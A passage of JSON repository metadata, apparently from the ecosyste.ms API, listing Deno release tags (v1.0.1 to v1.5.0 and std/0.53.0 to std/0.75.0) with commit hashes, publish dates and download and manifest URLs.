dencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0/manifests"},{"name":"std/0.75.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.75.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0/manifests"},{"name":"v1.4.6","sha":"9e9ec9784a639ef7205e1e303301ee558439b045","kind":"commit","published_at":"2020-10-10T10:30:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5/manifests"},{"name":"std/0.74.0","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.74.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0/manifests"},{"name":"v1.4.4","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4/manifests"},{"name":"std/0.73.0","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.73.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0/manifests"},{"name":"v1.4.3","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3/manifests"},{"name":"std/0.72.0","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.72.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0/manifests"},{"name":"v1.4.2","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2/manifests"},{"name":"std/0.71.0","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.71.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0/manifests"},{"name":"v1.4.1","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:40:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1/manifests"},{"name":"std/0.70.0","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:38:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.70.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0/manifests"},{"name":"v1.4.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0/manifests"},{"name":"std/0.69.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.69.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0/manifests"},{"name":"v1.3.3","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3/manifests"},{"name":"std/0.68.0","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.68.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0/manifests"},{"name":"v1.3.2","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2/manifests"},{"name":"std/0.67.0","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.67.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0/manifests"},{"name":"v1.3.1","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1/manifests"},{"name":"std/0.66.0","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.66.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0/manifests"},{"name":"v1.3.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0/manifests"},{"name":"std/0.65.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.65.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0/manifests"},{"name":"v1.2.3","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3/manifests"},{"name":"std/0.64.0","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.64.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0/manifests"},{"name":"v1.2.2","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2/manifests"},{"name":"std/0.63.0","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.63.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0/manifests"},{"name":"v1.2.1","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1/manifests"},{"name":"std/0.62.0","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.62.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0/manifests"},{"name":"v1.2.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0/manifests"},{"name":"std/0.61.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.61.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0/manifests"},{"name":"v1.1.3","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3/manifests"},{"name":"std/0.60.0","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.60.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0/manifests"},{"name":"v1.1.2","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2/manifests"},{"name":"std/0.59.0","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.59.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0/manifests"},{"name":"v1.1.1","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1/manifests"},{"name":"std/0.58.0","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.58.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0/manifests"},{"name":"v1.1.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0/manifests"},{"name":"std/0.57.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.57.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0/manifests"},{"name":"v1.0.5","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5/manifests"},{"name":"std/0.56.0","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.56.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0/manifests"},{"name":"v1.0.4","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4/manifests"},{"name":"std/0.55.0","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.55.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0/manifests"},{"name":"v1.0.3","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3/manifests"},{"name":"std/0.54.0","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.54.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0/manifests"},{"name":"std/0.53.0","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.53.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0/manifests"},{"name":"v1.0.2","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1","man